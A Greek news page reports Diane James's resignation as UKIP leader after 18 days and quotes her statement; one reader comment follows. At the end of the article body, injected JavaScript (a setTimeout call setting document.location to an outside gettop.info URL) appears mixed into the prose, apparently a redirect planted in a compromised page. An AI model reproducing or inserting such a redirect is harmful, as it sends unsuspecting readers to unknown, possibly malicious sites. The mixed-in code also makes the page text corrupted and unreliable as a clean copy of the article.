Παραιτήθηκε η διάδοχος του Φάρατζ, έπειτα από 18 ημέρες στο «τιμόνι»

1
3

 

Έπειτα από θητεία 18 ημερών υπέβαλε την παραίτησή της από την ηγεσία του UKIP η Νταϊάν Τζέιμς επικαλούμενη προσωπικούς και επαγγελματικούς λόγους.

Σε ανάρτηση στον λογιαριασμό της στο Twitter η Τζέιμς, που είχε ταχθεί υπέρ του Brexit σημείωσε πως «δεν θα επισημοποιήσω την πρόσφατη υποψηφιότητά μου να γίνω η νέα αρχηγός του κόμματος. Έχει καταστεί εμφανές πλέον ότι δεν έχω επαρκή εξουσία, ούτε την πλήρη υποστήριξη των συναδέλφων μου στο Ευρωκοινοβούλιο και των στελεχών του κόμματος για να υλοποιήσω τις αλλαγές που πιστεύω ότι είναι αναγκαίες και πάνω στις οποίες βάσισα την υποψηφιότητά μου«.

Η Νταϊάν Τζέιμς υπήρξε η διάδοχος του Νάιτζελ Φάρατζ στην ηγεσία του UKIP τον Σεπτέμβριο, έχοντας δεσμευτεί να εξασφαλίσει ότι η συντηρητική κυβέρνηση δεν θα διαπραγματευτεί το Brexit με ήπιους όρους. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Το πρόβλημα με όλα αυτά τα κόμματα/κινήματα είναι πως υπάρχουν μόνο για τη διαμαρτυρία. Αν γίνει κανένα «λάθος» και κερδίσουν κάποια μάχη, δεν ξέρουν πώς να τη διαχειριστούν.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here